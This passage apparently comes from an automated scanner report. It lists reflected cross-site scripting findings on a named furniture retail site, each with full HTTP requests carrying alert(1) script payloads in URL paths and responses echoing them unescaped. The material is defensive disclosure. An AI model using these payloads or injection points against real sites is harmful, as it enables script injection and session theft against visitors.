User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:01:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css livebar.css1f7b6<a>ab28509deab doesn't exist.</div>
...[SNIP]...

3.395. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/modelpage.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55efd"><script>alert(1)</script>6050ea0498 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/modelpage.css55efd"><script>alert(1)</script>6050ea0498?v=1.1 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:02:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/
Vary: User-Agent
Content-Length: 11992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/modelpage.css55efd"><script>alert(1)</script>6050ea0498" />
...[SNIP]...

3.396. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/modelpage.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd2f9<a>e80f7c98aa8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/modelpage.cssbd2f9<a>e80f7c98aa8?v=1.1 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:33:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/
Vary: User-Agent
Content-Length: 11946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css modelpage.cssbd2f9<a>e80f7c98aa8 doesn't exist.</div>
...[SNIP]...

3.397. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6097f"><script>alert(1)</script>416f2a5bc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/styles.css6097f"><script>alert(1)</script>416f2a5bc14?v=2.1 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 11:59:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/
Vary: User-Agent
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/styles.css6097f"><script>alert(1)</script>416f2a5bc14" />
...[SNIP]...

3.398. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 911f8<a>f98a4ba5f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/styles.css911f8<a>f98a4ba5f91?v=2.1 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:30:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/
Vary: User-Agent
Content-Length: 11940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css styles.css911f8<a>f98a4ba5f91 doesn't exist.</div>
...[SNIP]...

3.399. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7796c<a>4ced324bcc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico7796c<a>4ced324bcc4?v=1.0 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:30:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/
Vary: User-Agent
Content-Length: 11934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/favicon.ico7796c<a>4ced324bcc4 doesn't exist.</div>
...[SNIP]...

3.400. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d2e"><script>alert(1)</script>2a3a66be71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico61d2e"><script>alert(1)</script>2a3a66be71b?v=1.0 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 11:59:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/
Vary: User-Agent
Content-Length: 11982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/favicon.ico61d2e"><script>alert(1)</script>2a3a66be71b" />
...[SNIP]...

3.401. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /images/live_person/repoffline.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0ee3<a>6921f3b3855 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/live_person/repoffline.gifb0ee3<a>6921f3b3855?d=1317384679726 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:00:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/
Vary: User-Agent
Content-Length: 11978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/images live_person repoffline.gifb0ee3<a>6921f3b3855 doesn't exist.</div>
...[SNIP]...

3.402. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /images/live_person/repoffline.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bfc"><script>alert(1)</script>15377040f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/live_person/repoffline.gif45bfc"><script>alert(1)</script>15377040f0d?d=1317384679726 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:31:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/
Vary: User-Agent
Content-Length: 12026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/images/live_person/repoffline.gif45bfc"><script>alert(1)</script>15377040f0d" />
...[SNIP]...

3.403. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search-complete.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9711a"><script>alert(1)</script>384ea5f7ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search-complete.php9711a"><script>alert(1)</script>384ea5f7ffe?q=xss+&limit=10&timestamp=1317384695442 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:32:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
Vary: User-Agent
Content-Length: 11998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/search-complete.php9711a"><script>alert(1)</script>384ea5f7ffe" />
...[SNIP]...

3.404. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /search-complete.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc169<a>6387d5e35e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search-complete.phpdc169<a>6387d5e35e?q=xss+&limit=10&timestamp=1317384695442 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:32:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
Vary: User-Agent
Content-Length: 11948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/search complete.phpdc169<a>6387d5e35e doesn't exist.</div>
...[SNIP]...

3.405. http://www.hertzfurniture.com/search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea921<a>088e5054c61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search.phpea921<a>088e5054c61?find-box=xss%20chair%20desk%20shoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/
Vary: User-Agent
Content-Length: 11932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/search.phpea921<a>088e5054c61 doesn't exist.</div>
...[SNIP]...

3.406. http://www.hertzfurniture.com/search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f245f"-alert(1)-"205a1a30ed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f245f"-alert(1)-"205a1a30ed4?find-box=xss%20chair%20desk%20shoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
